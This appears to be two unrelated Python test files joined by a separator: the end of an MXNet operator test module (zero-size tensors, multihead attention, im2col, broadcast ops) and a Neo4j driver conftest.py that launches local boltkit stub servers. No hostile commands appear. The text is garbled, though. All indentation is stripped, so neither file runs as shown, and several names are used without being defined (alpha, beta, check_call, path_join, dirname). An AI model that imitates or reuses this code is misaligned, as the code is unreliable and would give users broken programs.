assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
@with_seed()
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
@with_seed()
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
ok_(isinstance(ops, list))
ok_(len(ops) > 0)
ok_('Activation' in ops)
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
ok_(isinstance(operator_arguments, OperatorArguments))
ok_(operator_arguments.names == ['data', 'act_type'])
ok_(operator_arguments.types
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"])
ok_(operator_arguments.narg == 2)
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
@with_seed()
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, alpha, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
hight = 1
assertRaises(MXNetError, mx.nd.random_uniform, alpha, beta, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@with_seed()
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
@with_seed()
def test_elementwise_ops_on_misaligned_input():
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[1:3]
d = b[1:3]
# Note: testing just elemwise_add since all elemwise_ops
# share the implementation
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[0:3]
d = b[0:3]
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
assert a[3].asscalar() == 4.0
@with_seed()
def test_broadcast_ops_on_misaligned_input():
dtypes = ['float16', 'float32', 'float64']
lead_dims = [2,3,4,6,10]
for dtype in dtypes:
for lead_dim in lead_dims:
for both_ways in [False, True]:
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], 1, lead_dim]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, L]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
@with_seed()
def test_broadcast_ops_on_misaligned_input_oneside():
dtypes = ['float16', 'float32', 'float64']
lead_dims = [2,3,4,6,10]
for dtype in dtypes:
for lead_dim in lead_dims:
for both_ways in [False, True]:
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], shape[1], 1]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, 1]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
if __name__ == '__main__':
import nose
nose.runmodule()
|
conftest.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright (c) 2002-2020 "Neo4j,"
# Neo4j Sweden AB [http://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import os
from threading import Thread
from time import sleep
from boltkit.server.stub import BoltStubService
from pytest import fixture
# import logging
# from neo4j.debug import watch
# watch("neo4j")
#
# log = logging.getLogger("neo4j")
class StubServer:
def __init__(self, port, script):
self.port = port
self.script = os.path.join(os.path.dirname(__file__), "scripts", script)
def run(self):
self._process = subprocess.Popen(["python", "-m", "boltkit", "stub", "-v", "-l", ":{}".format(str(self.port)), "-t", "10", self.script], stdout=subprocess.PIPE)
# Need verbose for this to work
line =self._process.stdout.readline()
def wait(self):
try:
returncode = self._process.wait(2)
if returncode != 0:
print("Stubserver failed with error")
return returncode == 0
except subprocess.TimeoutExpired:
print("Stubserver timeout!")
return False
def kill(self):
# Kill process if not already dead
if self._process.poll() is None:
self._process.kill()
class StubCluster:
def __init__(self, servers):
self.servers = {port: StubServer(port, script) for port, script in dict(servers).items()}
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_value, traceback):
self.wait()
def start(self):
for port, server in self.servers.items():
server.run()
def wait(self):
success = True
for port, server in self.servers.items():
if not server.wait():
success = False
server.kill()
if not success:
raise Exception("Stub server failed")
class LegacyStubServer(Thread):
def __init__(self, port, script):
super(LegacyStubServer, self).__init__()
self.port = port
self.script = os.path.join(os.path.dirname(__file__), "scripts", script)
def run(self):
check_call(["python", "-m", "boltkit.legacy.stub", "-v", str(self.port), self.script])
class LegacyStubCluster:
def __init__(self, servers):
self.servers = {port: LegacyStubServer(port, script) for port, script in dict(servers).items()}
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_value, traceback):
self.wait()
def start(self):
for port, server in self.servers.items():
server.start()
sleep(0.5)
def wait(self):
for port, server in self.servers.items():
server.join()
class DefaultBoltStubService(BoltStubService):
default_base_port = 9001
class StubCluster(StubCluster):
def __init__(self, *servers):
scripts = [os.path.join(os.path.dirname(__file__), "scripts", server) for server in servers]
bss = DefaultBoltStubService.load(*scripts)
servers2 = {port: script.filename for port, script in bss.scripts.items()}
super().__init__(servers2)
# def run():
# check_call(["bolt", "stub", "-v", "-t", "10", "-l", ":9001"] + scripts)
# self.thread = Thread(target=run)
# def __enter__(self):
# self.thread.start()
# sleep(0.5)
# def __exit__(self, exc_type, exc_value, traceback):
# self.thread.join(3)
@fixture
def script():
return lambda *paths: path_join(dirname(__file__), "scripts", *paths)
